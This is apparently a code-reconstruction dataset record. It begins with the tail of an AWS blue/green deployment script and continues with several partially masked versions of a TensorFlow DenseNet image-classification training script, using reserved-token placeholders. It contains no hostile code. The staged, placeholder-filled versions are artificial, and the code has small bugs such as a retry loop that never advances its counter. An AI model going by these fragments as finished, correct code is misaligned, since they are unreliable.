time.sleep(10)\n else:\n # We got it!\n public_ip = stg_instance[0].ip_address\n return str(public_ip)\n\n counter += 1\n\n # Unfortunately we couldn't get Public IP so logging and exiting.\n stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])\n LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)\n sys.exit(1)\n\n\ndef simple_check(url):\n \"\"\"\n :description: Checks if given url is returning 200 respond code for 10 minutes in 60 seconds intervals.\n :param\n url: link which should be checked\n :return: Boolean\n \"\"\"\n\n counter = 0\n\n while counter < 10:\n try:\n r = requests.head('http://' + url)\n LOGGER.debug(r.status_code)\n if r.status_code == 200:\n return True\n else:\n time.sleep(60)\n except requests.ConnectionError:\n LOGGER.error(\"Failed to get respond code from %s - attempt #%s\" % (url, counter + 1))\n\n return False\n\n\ndef write_to_file(to_write):\n f = open('parameters.properties', 'w')\n f.write(to_write)\n\n\ndef switch(region, access_key, secret_key, tag, domain, live_url, blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.\n :param\n ec2_conn: Connection to AWS EC2 service\n old_tag: Dictionary with <tag_name> <tag_value> pair\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean status\n \"\"\"\n result = True\n\n # 1. Connects to AWS\n aws_conn = connect_to_aws(region, access_key, secret_key)\n\n # 2. Check which is live at the moment and which should be stopped.\n live = check_which_is_live(aws_conn.get('route53'), domain, live_url)\n\n # 3. Swap DNS\n result = swap_live_with_staging(aws_conn, domain, live, live_url, blue_alias, green_alias, dry_run)\n\n # 4. Stop and tag old one. We will do it after 5 minutes to give chance to safely close all connections.\n time.sleep(300)\n stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag, dry_run)\n\n return result\n\n\ndef roll_back(region, access_key, secret_key, tag, domain, live_alias, blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.\n :param\n ec2_conn: Connection to AWS EC2 service\n old_tag: Dictionary with <tag_name> <tag_value> pair\n dry-run: True or False. If True, it will not make any changes.\n :return: boolean status\n \"\"\"\n result = True\n\n # 1. Connects to AWS\n aws_conn = connect_to_aws(region, access_key, secret_key)\n\n # 2. Get instance ID of old instance. Check which environment is live.\n old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.keys()), ''.join(tag.values()),\n ['stopped', 'running'])\n current_live = check_which_is_live(aws_conn.get('route53'), domain, live_alias)\n env = get_env(current_live, domain)\n\n # 3. Do the Magic ;)\n if not old_instance:\n LOGGER.error('No instance with tag %s was found. No chance to roll back Sir!' % ''.join(tag.values()))\n else:\n try:\n if dry_run:\n LOGGER.warning('Instance %s would be started and tagged with %s' % (old_instance, env))\n else:\n # Start old instance\n old_instance[0].start()\n tag_instance(old_instance[0], 'Environment', 'blue' if env == 'green' else 'green')\n\n # Refresh its public IP as it could change.\n instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'), old_instance[0].id)\n\n assign_to_staging(aws_conn.get('route53'), domain, current_live, instance_public_ip, live_alias,\n blue_alias, green_alias, dry_run=False)\n swap_live_with_staging(aws_conn, domain, current_live, live_alias, blue_alias, green_alias, dry_run)\n stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)\n except exception.EC2ResponseError:\n LOGGER.error('Could not start %s instance.' % old_instance)\n result = False\n\n return result\n\n\ndef deployment_stage(region, access_key, secret_key, srv_name, domain, live_url, blue_alias, green_alias, tag, image_id,\n ssh_key, sec_group, subnet_id, instance_size, shutdown, dry_run=False):\n \"\"\"\n :description: Delivers new instance with staging dns (blue / green).\n :param\n region: region to which you want to deploy your instance\n access_key: AWS Access Key\n secret_key: AWS Secret Key\n srv_name: How you want to call your web server\n domain: Your domain\n live_url: DNS record for your live website\n blue_url: Blue Url\n green_url: Green Url\n old_tag: Dictionary with <tag_name> <tag_value> pair\n image_id: Amazon Machine Image ID with all your software\n ssh_key: AWS key pair name\n sec_group: Security group ID that should be allocated\n subnet_id: Subnet ID in which your instance should be created\n instance_size: String with instance size\n shutdown_behaviour: stop or termination\n dry-run: True or False. If True, it will not make any changes.\n :return: string with url and ip address to staging server\n \"\"\"\n # 1. Connects to AWS\n aws_connections = connect_to_aws(region, access_key, secret_key)\n\n # 2. Delete old instance which should be stopped\n deleted = delete_old_instance(aws_connections.get('ec2'), tag, dry_run)\n\n # 3. Check which environment (blue/green) is live\n live = check_which_is_live(aws_connections.get('route53'), domain, live_url)\n if live == blue_alias:\n env = 'green'\n else:\n env = 'blue'\n\n # 4. If deleted then we can create new instance\n if dry_run:\n # Dry Run\n create_new_instance(aws_connections.get('ec2'), image_id, ssh_key, sec_group, subnet_id, env, srv_name, None,\n instance_size, shutdown, dry_run)\n assign_to_staging(aws_connections.get('route53'), domain, live, \"127.0.0.1\", live_url, blue_alias,\n green_alias, dry_run)\n\n sys.exit(0)\n elif deleted:\n staging_instance = create_new_instance(aws_connections.get('ec2'), image_id, ssh_key, sec_group, subnet_id, env,\n srv_name, None, instance_size, shutdown, dry_run)\n\n # 5. Assign right dns alias only if we managed to create instance in previous step\n if staging_instance is None:\n # There were some problems with creating new instance\n LOGGER.error('Could not create new instance.')\n sys.exit(1)\n else:\n # Everything was all right. Waiting for Public IP\n if staging_instance[0].ip_address is None:\n # Unfortunately Public IP is not available straight away so we have to wait for it.\n public_ip = wait_for_public_ip(aws_connections.get('ec2'), staging_instance[0].id)\n\n if public_ip is None:\n LOGGER.error('Cannot get Public IP from instance %s' % staging_instance[0].id)\n sys.exit(1)\n else:\n # Or maybe it is? :)\n public_ip = staging_instance[0].ip_address\n\n assign_to_staging(aws_connections.get('route53'), domain, live, public_ip, live_url, blue_alias, green_alias,\n dry_run)\n\n write_to_file(\"staging-server = \" + public_ip)\n\n return str(env + \".\" + domain + \": \" + public_ip)\n\nLOGGER = set_up_logging(log_path, file_name)\n",
"step-ids": [
1,
10,
14,
15,
23
]
}
|
[
1,
10,
14,
15,
23
] |
<|reserved_special_token_0|>
class MyModel:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MyModel:
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def densenet(D, DT, F, model):
import scipy.io as sio
import time
import os
import math
import numpy as np
import matplotlib.pyplot as plt
Dataset = D
if DT == 'org':
data_type = 'original'
else:
data_type = 'augmented'
fs = model.fs
fm1 = model.fm1
batch_size = model.batch_size[0]
learn_rate = model.learn_rate
num_layers = model.num_layers
k_fm = model.k_fm
bottleneck = model.bottleneck
dropout_prob = model.dropout_prob
num_of_test = model.num_of_test
if F == 1:
file_name = '1st_fold'
elif F == 2:
file_name = '2nd_fold'
elif F == 3:
file_name = '3rd_fold'
elif F == 4:
file_name = '4th_fold'
elif F == 5:
file_name = '5th_fold'
path = os.path.join('CrossVal', 'D' + Dataset)
print('path ', path)
if data_type == 'original':
Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +
file_name + '_train.mat'))
else:
Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +
'_' + file_name + '_train.mat'))
Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +
'_test.mat'))
if Dataset == '1':
number_of_classes = 24
num_of_ep = 50
num_of_test = 20
if data_type == 'augmented':
train_imgs = 526190
else:
train_imgs = 52619
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
elif Dataset == '2':
number_of_classes = 36
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 20120
else:
train_imgs = 2012
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
else:
number_of_classes = 10
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 16000
else:
train_imgs = 1600
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
iteration_to_display = int(iteration / num_of_test)
list_to_display = []
for i in range(num_of_test):
if i != num_of_test:
list_to_display.append(int(iteration_to_display * (i + 1)))
del i
total_fm_Block_1 = fm1 + num_layers * k_fm
total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm
total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm
fc_nodes = [total_fm_Block_3]
Train_Images = Train['trainImages']
Train_Labels = Train['trainLabels2']
total_trainImages = len(Train_Images[0, 2])
print(total_trainImages)
Train_Images = Train_Images.reshape(784, total_trainImages).transpose(
).astype('float32')
Train_Labels = Train_Labels.transpose().astype('float64')
Test_Images = Test['testImages']
Test_Labels = Test['testLabels2']
total_testImages = len(Test_Images[0, 2])
Test_Images = Test_Images.reshape(784, total_testImages).transpose(
).astype('float32')
Test_Labels = Test_Labels.transpose().astype('float64')
Target_labels = np.argmax(Test_Labels, axis=1)
del Test
del Train
import tensorflow as tf
tf.reset_default_graph()
g = tf.Graph()
with g.as_default():
tf.set_random_seed(1)
def weight_variable(shape, n):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=n)
def bias_variable(shape, n):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=n)
def avg_pool(input, s):
return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')
def max_pool(input, s):
return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')
def conv2d_1(input, in_features, out_features, kernel_size, name=
'W', with_bias=False):
W = weight_variable([kernel_size, kernel_size, in_features,
out_features], name)
conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')
if with_bias:
return conv + bias_variable([out_features])
return conv
def batch_activ_conv(current, in_features, out_features,
kernel_size, is_training, keep_prob, idx, scope='conv_block'):
with tf.variable_scope(scope):
current = tf.layers.batch_normalization(current, scale=True,
training=is_training)
current = tf.nn.relu(current)
current = conv2d_1(current, in_features, out_features,
kernel_size, name='W' + str(idx))
current = tf.nn.dropout(current, keep_prob)
return current
def block(input, layers, in_features, growth, is_training,
keep_prob, name='Block_'):
with tf.name_scope(name):
with tf.variable_scope(name):
current = input
features = in_features
for idx in range(layers):
tmp = batch_activ_conv(current, features, growth,
fs, is_training, keep_prob, idx + 1, scope=
'conv_block_' + str(idx + 1))
current = tf.concat((current, tmp), axis=3)
features += growth
return current, features
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])
x_image = tf.reshape(x, [-1, 28, 28, 1])
keep_prob = tf.placeholder(tf.float32)
training = tf.placeholder(tf.bool)
current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)
current, features = block(current, num_layers, fm1, k_fm, training,
keep_prob, name='Block_1')
b1_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_1')
t1_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_1_1')
t1_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
current, features = block(current, num_layers, features, k_fm,
training, keep_prob, name='Block_2')
b2_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr_2'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_2')
t2_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_2_1')
t2_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
current, features = block(current, num_layers, features, k_fm,
training, keep_prob, name='Block_3')
b3_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr_3'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_3')
t3_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_3_1')
t3_conv_printop = tf.Print(current, [current])
current = avg_pool(current, 7)
current = tf.reshape(current, [tf.shape(current)[0], -1])
with tf.name_scope('Dense_Last_lyr'):
W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')
b_fc3 = bias_variable([number_of_classes], 'b_fc3')
y_conv = tf.matmul(current, W_fc3) + b_fc3
prediction_prob = tf.nn.softmax(y_conv)
prediction_prob_printop = tf.Print(prediction_prob, [
prediction_prob])
with tf.name_scope('Xent'):
cross_entropy = tf.reduce_mean(tf.nn.
softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
with tf.name_scope('train'):
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_step = tf.train.AdamOptimizer(learn_rate).minimize(
cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(
y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax
(y_, 1))
wrong_prediction_printop = tf.Print(wrong_prediction, [
wrong_prediction])
predicted_labels = tf.argmax(y_conv, 1)
predicted_labels_printop = tf.Print(predicted_labels, [
predicted_labels])
index = 0
index_end = index + batch_size
remaining = 0
start_time = time.time()
costs = []
accuracy_list = []
list_of_predicted_list = []
with tf.Session() as sess:
sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))
for i in range(iteration):
if index_end > total_trainImages:
remaining = total_trainImages - (index_end - batch_size)
images = Train_Images[index_end - batch_size:
total_trainImages, :]
labels = Train_Labels[index_end - batch_size:
total_trainImages, :]
index = 0
index_end = index + batch_size - remaining
images = np.vstack((images, Train_Images[index:
index_end, :]))
labels = np.vstack((labels, Train_Labels[index:
index_end, :]))
batch = images, labels
index = index_end
index_end = index + batch_size
else:
batch = Train_Images[index:index_end, :], Train_Labels[
index:index_end, :]
index = index + batch_size
index_end = index_end + batch_size
if i in list_to_display:
elapsed_time = time.time() - start_time
print('Elapsed Time Before for loop: %f secs' %
elapsed_time)
Accuracy = 0
itrt_index = i
print('debug: %d & %d' % (iteration, i))
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index, :]).reshape(
1, 784)
t_label = np.array(Test_Labels[img_index, :]).reshape(
1, number_of_classes)
test_acc = accuracy.eval(feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
Accuracy += test_acc
wrong, predicted, prediction_prob = sess.run([
wrong_prediction_printop,
predicted_labels_printop,
prediction_prob_printop], feed_dict={x: t_image,
y_: t_label, keep_prob: 1.0, training: False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess
.run([b1_conv_printop, b2_conv_printop,
b3_conv_printop, t1_conv_printop,
t2_conv_printop, t3_conv_printop,
t1_b_conv_printop, t2_b_conv_printop,
t3_b_conv_printop], feed_dict={x: t_image,
y_: t_label, keep_prob: 1.0, training: False}))
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list, b1, axis=0)
b2_list = np.append(b2_list, b2, axis=0)
b3_list = np.append(b3_list, b3, axis=0)
t1_list = np.append(t1_list, t1, axis=0)
t2_list = np.append(t2_list, t2, axis=0)
t3_list = np.append(t3_list, t3, axis=0)
t1_b_list = np.append(t1_b_list, t1_b, axis=0)
t2_b_list = np.append(t2_b_list, t2_b, axis=0)
t3_b_list = np.append(t3_b_list, t3_b, axis=0)
if img_index == 0:
wrong_list_1 = wrong
predicted_list_1 = predicted
prediction_prob_1 = prediction_prob
else:
wrong_list_1 = np.append(wrong_list_1, wrong,
axis=0)
predicted_list_1 = np.append(predicted_list_1,
predicted, axis=0)
prediction_prob_1 = np.append(prediction_prob_1,
prediction_prob)
Accuracy = Accuracy / num_test
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list_1)
print('Average test accuracy: %g' % Accuracy)
epoch_around = math.ceil(itrt_index * batch_size /
total_trainImages)
sio.savemat('D' + Dataset + '_' + file_name + '_' + str
(epoch_around) + 'ep_' + data_type +
'_predicted_labels_list.mat', {'wrong_list':
wrong_list_1, 'predicted_list': predicted_list_1,
'Target_labels': Target_labels, 'prediction_prob':
prediction_prob, 'b1_list': b1_list, 'b2_list':
b2_list, 'b3_list': b3_list, 't1_list': t1_list,
't2_list': t2_list, 't3_list': t3_list, 't1_b_list':
t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':
t3_b_list})
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print(
'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'
% (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = itrt_index * batch_size / total_trainImages
print('Number of epochs : %f ' % epoch_around)
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title('Learning rate =' + str(learn_rate))
plt.show()
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={x: batch[0],
y_: batch[1], keep_prob: 1.0, training: False})
print('step %d, training accuracy %g' % (i, train_accuracy)
)
_, loss = sess.run([train_step, cross_entropy], feed_dict={
x: batch[0], y_: batch[1], keep_prob: dropout_prob,
training: True})
iteration_cost = 0
num_minibatches = int(total_trainImages / batch_size)
iteration_cost += loss / num_minibatches
costs.append(iteration_cost)
if i % 100 == 0:
print('Loss: ', loss)
Accuracy = 0
training_time = time.time() - start_time
print('Training Time: %f secs' % training_time)
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)
t_label = np.array(Test_Labels[img_index, :]).reshape(1,
number_of_classes)
test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,
keep_prob: 1.0, training: False})
Accuracy += test_acc
wrong, predicted = sess.run([wrong_prediction_printop,
predicted_labels_printop], feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([
b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop, t2_conv_printop, t3_conv_printop,
t1_b_conv_printop, t2_b_conv_printop,
t3_b_conv_printop], feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list, b1, axis=0)
b2_list = np.append(b2_list, b2, axis=0)
b3_list = np.append(b3_list, b3, axis=0)
t1_list = np.append(t1_list, t1, axis=0)
t2_list = np.append(t2_list, t2, axis=0)
t3_list = np.append(t3_list, t3, axis=0)
t1_b_list = np.append(t1_b_list, t1_b, axis=0)
t2_b_list = np.append(t2_b_list, t2_b, axis=0)
t3_b_list = np.append(t3_b_list, t3_b, axis=0)
if img_index == 0:
wrong_list = wrong
predicted_list = predicted
else:
wrong_list = np.append(wrong_list, wrong, axis=0)
predicted_list = np.append(predicted_list, predicted,
axis=0)
Accuracy = Accuracy / num_test
print('Average test accuracy: %g' % Accuracy)
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list)
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print(
'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %
(batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = math.ceil(iteration * batch_size / total_trainImages
)
if epoch_around == 51:
epoch_around = 50
print('Number of epochs : %f ' % epoch_around)
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title('Learning rate =' + str(learn_rate))
plt.show()
sio.savemat('D' + Dataset + '_' + file_name + '_' + str(
epoch_around) + 'ep_' + data_type +
'_predicted_labels_list.mat', {'wrong_list': wrong_list,
'predicted_list': predicted_list, 'Target_labels':
Target_labels, 'accuracy_list': accuracy_list,
'list_of_predicted_list': list_of_predicted_list, 'costs':
costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':
b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':
t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,
't3_b_list': t3_b_list})
class MyModel:
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def densenet(D, DT, F, model):
import scipy.io as sio
import time
import os
import math
import numpy as np
import matplotlib.pyplot as plt
Dataset = D
if DT == 'org':
data_type = 'original'
else:
data_type = 'augmented'
fs = model.fs
fm1 = model.fm1
batch_size = model.batch_size[0]
learn_rate = model.learn_rate
num_layers = model.num_layers
k_fm = model.k_fm
bottleneck = model.bottleneck
dropout_prob = model.dropout_prob
num_of_test = model.num_of_test
if F == 1:
file_name = '1st_fold'
elif F == 2:
file_name = '2nd_fold'
elif F == 3:
file_name = '3rd_fold'
elif F == 4:
file_name = '4th_fold'
elif F == 5:
file_name = '5th_fold'
path = os.path.join('CrossVal', 'D' + Dataset)
print('path ', path)
if data_type == 'original':
Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +
file_name + '_train.mat'))
else:
Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +
'_' + file_name + '_train.mat'))
Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +
'_test.mat'))
if Dataset == '1':
number_of_classes = 24
num_of_ep = 50
num_of_test = 20
if data_type == 'augmented':
train_imgs = 526190
else:
train_imgs = 52619
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
elif Dataset == '2':
number_of_classes = 36
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 20120
else:
train_imgs = 2012
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
else:
number_of_classes = 10
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 16000
else:
train_imgs = 1600
iteration = math.ceil(num_of_ep * train_imgs / batch_size)
iteration_to_display = int(iteration / num_of_test)
list_to_display = []
for i in range(num_of_test):
if i != num_of_test:
list_to_display.append(int(iteration_to_display * (i + 1)))
del i
total_fm_Block_1 = fm1 + num_layers * k_fm
total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm
total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm
fc_nodes = [total_fm_Block_3]
Train_Images = Train['trainImages']
Train_Labels = Train['trainLabels2']
total_trainImages = len(Train_Images[0, 2])
print(total_trainImages)
Train_Images = Train_Images.reshape(784, total_trainImages).transpose(
).astype('float32')
Train_Labels = Train_Labels.transpose().astype('float64')
Test_Images = Test['testImages']
Test_Labels = Test['testLabels2']
total_testImages = len(Test_Images[0, 2])
Test_Images = Test_Images.reshape(784, total_testImages).transpose(
).astype('float32')
Test_Labels = Test_Labels.transpose().astype('float64')
Target_labels = np.argmax(Test_Labels, axis=1)
del Test
del Train
import tensorflow as tf
tf.reset_default_graph()
g = tf.Graph()
with g.as_default():
tf.set_random_seed(1)
def weight_variable(shape, n):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=n)
def bias_variable(shape, n):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=n)
def avg_pool(input, s):
return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')
def max_pool(input, s):
return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')
def conv2d_1(input, in_features, out_features, kernel_size, name=
'W', with_bias=False):
W = weight_variable([kernel_size, kernel_size, in_features,
out_features], name)
conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')
if with_bias:
return conv + bias_variable([out_features])
return conv
def batch_activ_conv(current, in_features, out_features,
kernel_size, is_training, keep_prob, idx, scope='conv_block'):
with tf.variable_scope(scope):
current = tf.layers.batch_normalization(current, scale=True,
training=is_training)
current = tf.nn.relu(current)
current = conv2d_1(current, in_features, out_features,
kernel_size, name='W' + str(idx))
current = tf.nn.dropout(current, keep_prob)
return current
def block(input, layers, in_features, growth, is_training,
keep_prob, name='Block_'):
with tf.name_scope(name):
with tf.variable_scope(name):
current = input
features = in_features
for idx in range(layers):
tmp = batch_activ_conv(current, features, growth,
fs, is_training, keep_prob, idx + 1, scope=
'conv_block_' + str(idx + 1))
current = tf.concat((current, tmp), axis=3)
features += growth
return current, features
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])
x_image = tf.reshape(x, [-1, 28, 28, 1])
keep_prob = tf.placeholder(tf.float32)
training = tf.placeholder(tf.bool)
current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)
current, features = block(current, num_layers, fm1, k_fm, training,
keep_prob, name='Block_1')
b1_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_1')
t1_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_1_1')
t1_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
current, features = block(current, num_layers, features, k_fm,
training, keep_prob, name='Block_2')
b2_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr_2'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_2')
t2_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_2_1')
t2_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
current, features = block(current, num_layers, features, k_fm,
training, keep_prob, name='Block_3')
b3_conv_printop = tf.Print(current, [current])
with tf.name_scope('transition_lyr_3'):
current = batch_activ_conv(current, features, bottleneck * k_fm,
1, training, keep_prob, 1, scope='Transition_layer_3')
t3_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck * k_fm, features,
fs, training, keep_prob, 1, scope='Transition_layer_3_1')
t3_conv_printop = tf.Print(current, [current])
current = avg_pool(current, 7)
current = tf.reshape(current, [tf.shape(current)[0], -1])
with tf.name_scope('Dense_Last_lyr'):
W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')
b_fc3 = bias_variable([number_of_classes], 'b_fc3')
y_conv = tf.matmul(current, W_fc3) + b_fc3
prediction_prob = tf.nn.softmax(y_conv)
prediction_prob_printop = tf.Print(prediction_prob, [
prediction_prob])
with tf.name_scope('Xent'):
cross_entropy = tf.reduce_mean(tf.nn.
softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
with tf.name_scope('train'):
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_step = tf.train.AdamOptimizer(learn_rate).minimize(
cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(
y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax
(y_, 1))
wrong_prediction_printop = tf.Print(wrong_prediction, [
wrong_prediction])
predicted_labels = tf.argmax(y_conv, 1)
predicted_labels_printop = tf.Print(predicted_labels, [
predicted_labels])
index = 0
index_end = index + batch_size
remaining = 0
start_time = time.time()
costs = []
accuracy_list = []
list_of_predicted_list = []
with tf.Session() as sess:
sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))
for i in range(iteration):
if index_end > total_trainImages:
remaining = total_trainImages - (index_end - batch_size)
images = Train_Images[index_end - batch_size:
total_trainImages, :]
labels = Train_Labels[index_end - batch_size:
total_trainImages, :]
index = 0
index_end = index + batch_size - remaining
images = np.vstack((images, Train_Images[index:
index_end, :]))
labels = np.vstack((labels, Train_Labels[index:
index_end, :]))
batch = images, labels
index = index_end
index_end = index + batch_size
else:
batch = Train_Images[index:index_end, :], Train_Labels[
index:index_end, :]
index = index + batch_size
index_end = index_end + batch_size
if i in list_to_display:
elapsed_time = time.time() - start_time
print('Elapsed Time Before for loop: %f secs' %
elapsed_time)
Accuracy = 0
itrt_index = i
print('debug: %d & %d' % (iteration, i))
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
